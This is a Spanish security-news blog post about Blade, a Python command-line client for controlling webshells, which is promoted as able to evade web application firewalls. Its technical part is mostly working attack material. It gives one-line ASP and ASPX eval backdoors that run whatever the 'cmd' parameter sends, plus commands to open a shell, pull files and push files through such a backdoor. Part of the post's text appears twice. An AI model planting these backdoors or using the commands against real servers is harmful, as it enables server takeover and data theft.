Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1110
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
▼
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
▼
enero
(Total:
19
)
-
Supuestos Archivos PDF y protectores de pantalla r...
-
Blade: una nueva webshell ASP, PHP y JSP
-
Malwarebytes presenta un Anti-Ransomware beta
-
Antivirus LiveCD 16.0-0.99 con el motor antivirus ...
-
Un hospital de Melbourne paralizado por un virus p...
-
Skype por fín oculta tu dirección IP real
-
Página web Crashsafari que hace colgar tu iPhone o...
-
Xiaomi M5: precio y características ya filtradas
-
WhatsApp anuncia que será gratis para siempre
-
El ransomware CryptoJoker no es cosa de risa
-
CES 2016: las novedades tecnológicas para este año
-
Se gasta 7.000 euros jugando al FIFA en la Xbox
-
¿Cómo programar en C en 2016?
-
Es oficial: Internet Explorer 8, 9 y 10 se quedará...
-
BlackBerry abandonará definitivamente su sistema o...
-
Oculus Rift ya disponible para reserva por 699 euros
-
Intel actualiza su Computer Stick con procesadores...
-
Microsoft avisará a los usuarios ante accesos no a...
-
Samsung presenta un SSD portable con USB Type-C y ...
-
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
- Este Centro de Llamadas Fraudulento es HACKEADO y DESTRUIDO con Malware del FBI
- El robo del siglo: así perpetró Corea del Norte el mayor hurto de activos digitales de la historia para financiar su pro
- Nuevo DNI digital: cómo funciona y cuándo será posible llevar el DNI en el móvil
- Trump restó importancia a la filtración de planes militares de EEUU en un chat
- Corea del Norte prepara un ejército de hackers: especializados en IA para espiar a Occidente
Etiquetas
seguridad
(
405
)
google
(
390
)
privacidad
(
373
)
ransomware
(
361
)
vulnerabilidad
(
343
)
Malware
(
280
)
cve
(
274
)
tutorial
(
274
)
Windows
(
270
)
android
(
268
)
manual
(
259
)
hardware
(
229
)
software
(
210
)
linux
(
133
)
twitter
(
118
)
ddos
(
100
)
WhatsApp
(
99
)
Wifi
(
88
)
cifrado
(
81
)
herramientas
(
77
)
nvidia
(
77
)
hacking
(
76
)
app
(
70
)
sysadmin
(
70
)
Networking
(
63
)
ssd
(
60
)
youtube
(
53
)
firmware
(
45
)
office
(
44
)
adobe
(
43
)
hack
(
41
)
firefox
(
36
)
contraseñas
(
34
)
eventos
(
32
)
juegos
(
32
)
antivirus
(
31
)
cms
(
30
)
apache
(
29
)
MAC
(
28
)
flash
(
28
)
anonymous
(
27
)
programación
(
25
)
exploit
(
24
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
21
)
ssl
(
20
)
SeguridadWireless
(
17
)
Forense
(
16
)
documental
(
16
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
Rootkit
(
9
)
adamo
(
9
)
reversing
(
9
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Pavel Durov , fundador de Telegram , se ha opuesto firmemente al uso de puertas traseras en las aplicaciones de mensajería que está propon...
-
LaLiga no hace más que crearse enemigos. En su lucha contra la piratería, avalada por los tribunales de justicia, termina haciendo verdade...
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
Blade: una nueva webshell ASP, PHP y JSP
sábado, 30 de enero de 2016
|
Publicado por
el-brujo
|
Editar entrada
Blade es una herramienta de conexión a webshell basado en consola, actualmente en fase de desarrollo que pretende ser una alternativa al chino Chooper.
¿Por qué? Pues porque Chooper es un cliente Webshell genial, que soporta muchos scripts del lado del servidor, pero sólo puede trabajar en Windows. De ahí la motivación de crear otro "Chooper" pero multiplataforma: compatible con Windows, Linux y Mac OS X.
Blade se basa en Python por lo que permite a los usuarios modificar los payloads de conexión del Webshell de manera que puede evadir algunos WAF que Chooper no puede. Sus funciones principales son:
Obtener una shell:
Subir un archivo:
Fuentes:
http://www.hackplayers.com/2016/01/blade-un-webshell-en-python-para-evadir-waf.html
¿Por qué? Pues porque Chooper es un cliente Webshell genial, que soporta muchos scripts del lado del servidor, pero sólo puede trabajar en Windows. De ahí la motivación de crear otro "Chooper" pero multiplataforma: compatible con Windows, Linux y Mac OS X.
Blade se basa en Python por lo que permite a los usuarios modificar los payloads de conexión del Webshell de manera que puede evadir algunos WAF que Chooper no puede. Sus funciones principales son:
- Administra un servidor web con una sóla línea de código:
- Compatible con PHP, ASP, ASPX y JSP
- Proporciona una consola de terminal
- Gestión de archivos y base de datos
PHP: ASP: <%eval request("cmd")%> ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
Obtener una shell:
python blade.py -u http: //localhost/shell.php -s php -p cmd --shell
Descargar un archivo:python blade.py -u http: //localhost/shell.php -s php -p cmd --pull REMOTE_PATH local_path
Subir un archivo:
python blade.py -u http: //localhost/shell.php -s php -p cmd --push local_path REMOTE_PATH
Actualmente sólo está desarrollado el soporte PHP y ASP y todavía no
está implementada completamente la gestión de base de datos pero, si
continúa su desarrollo, puede resultar un Webshell más que interesante:Fuentes:
http://www.hackplayers.com/2016/01/blade-un-webshell-en-python-para-evadir-waf.html
Entradas relacionadas:

Ciberactores Chinos atacan servidores de correo Microsoft Exchange

Optimizar módulo PHP FPM y opciones de seguridad en PHP

Servidor Blade vs. Servidor de Rack vs. Servidor de Torre
-1.jpg)
Vulnerabilidad crítica en la función extract() de PHP permite la ejecución de código ...

Vulnerabilidades críticas en PHP y Apache Tomcat

PHP: mod_php vs CGI vs FastCGI vs FPM
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.